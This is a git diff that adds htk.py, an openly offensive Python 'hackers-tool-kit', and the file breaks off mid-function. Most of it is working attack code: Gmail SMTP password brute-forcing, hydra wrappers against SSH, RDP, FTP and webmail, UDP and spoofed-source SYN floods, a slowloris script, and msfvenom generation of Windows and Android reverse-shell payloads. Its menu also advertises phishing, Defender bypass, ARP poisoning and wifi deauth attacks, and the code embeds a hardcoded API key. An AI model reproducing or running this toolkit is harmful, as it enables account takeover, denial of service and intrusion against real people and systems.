files via upload --- htk.py | 1966 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1966 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..96bc626 --- /dev/null +++ b/htk.py @@ -0,0 +1,1966 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to edit this script without my credit +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + print N+""" _ _ _ _ _ _ _ + _ _ _ _ _ _ _ + | |__ __ _ ___| | _____ _ __ ___ | |_ ___ ___ | | | | _(_) |_ + | '_ \ / _` |/ __| |/ / _ \ '__/ __|_____| __/ _ \ / _ \| |_____| |/ / | __| + | | | | (_| | (__| < __/ | \__ \_____| || (_) | (_) | |_____| <| | |_ \033[91m + |_| |_|\__,_|\___|_|\_\___|_| |___/ \__\___/ \___/|_| |_|\_\_|\__|\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal +arppois : ARP poisoning +sslscan : ssl scan a host +payload : make a metasploit payload of your choice +crunch : Make wordlists +traff : shows your internet traffic +resa : reset account password +resu : reset unix password +hashid : find the type of hash of a hash +wafwoof : check a web application for firewall +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + os.system("python " + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') + os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) + os.system('echo "run\n" >> handler.rc') + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE 